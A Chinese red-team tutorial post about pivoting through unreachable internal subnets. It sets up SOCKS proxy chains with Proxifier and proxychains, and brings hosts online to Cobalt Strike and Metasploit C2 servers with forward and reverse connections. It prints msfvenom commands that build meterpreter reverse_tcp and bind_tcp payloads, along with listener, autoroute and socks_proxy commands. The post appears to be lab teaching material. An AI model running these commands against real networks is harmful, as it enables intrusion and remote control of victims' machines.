内网对抗-代理通讯篇&不出网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

知识点

1、代理隧道篇-代理通讯网络不可达-正反向连接上线
2、代理隧道篇-代理通讯网络不可达-SockS代理配置
在这里插入图片描述
在这里插入图片描述

实现步骤

1、在被控机器上获取下一级网段
2、在被控及其上建立SockS节点
(注意:socks代理是可以继承的,也就是说在windows2016上建立socks节点,会继承前面几台服务器上的socks节点)
3、在工具上配置连接属性和规则触发
  • 1
  • 2
  • 3
  • 4

演示案例-代理技术-正反向监听/SockS配置-网络不可达-通讯解决/c2上线

解决:信息收集打点和漏洞利用部分
C2平台:MSF/CS/Sliver/Viper等

在这里插入图片描述
在这里插入图片描述

1、CS

在这里插入图片描述

192.168.139.x 网段反向上线

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

socks代理链接工具-Proxifier(windows)
注意:配置连接IP为C2服务器IP
C2服务器是一个远程服务器,‌用于管理和控制受感染的计算机或设备。‌C2服务器通常被用于网络攻击活动中,‌攻击者通过C2服务器发送命令,‌控制受感染的设备进行恶意行为

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里假设这个2.22的服务器存在漏洞能直接上线C2服务器,就会涉及一个C2正反向上线问题。

192.168.2.x 网段正向上线
反向监听器:reverse
正向监听器:bind(需主动连接)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

192.168.3.x 网段正向上线

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

也可以使用;号在后面添加3的网段,因为这样2的网段也可以访问
  • 1

在这里插入图片描述
在这里插入图片描述
继续正向上线这个3.22服务器
在这里插入图片描述
在这里插入图片描述

192.168.4.x 网段正向上线

同理

2、MSF

192.168.139.x 网段反向上线

配置反向上线:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

在这里插入图片描述

查看路由表
run post/multi/manage/autoroute
run autoroute -p
  • 1
  • 2

在这里插入图片描述
background 返回不结束会话

创建socks节点
use auxiliary/server/socks_proxy

在这里插入图片描述
在这里插入图片描述

socks代理链接工具-proxychains(linux)

加入修改配置:

/etc/proxychains4.conf

在这里插入图片描述
调用加载测试:

 proxychains4 curl http://192.168.2.22

在这里插入图片描述

192.168.2.x 网段正向上线

配置正向上线:

msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run

在这里插入图片描述
在这里插入图片描述
查看路由表:

run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

use auxiliary/server/socks_proxy

在这里插入图片描述
加入修改配置:

/etc/proxychains4.conf

在这里插入图片描述
在这里插入图片描述

192.168.3.x 网段正向上线

配置正向上线:

msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run

在这里插入图片描述
查看路由表:

run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

use auxiliary/server/socks_proxy

在这里插入图片描述
加入修改配置:

 /etc/proxychains4.conf

在这里插入图片描述
在这里插入图片描述

192.168.4.x 网段正向上线

配置正向上线:

msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值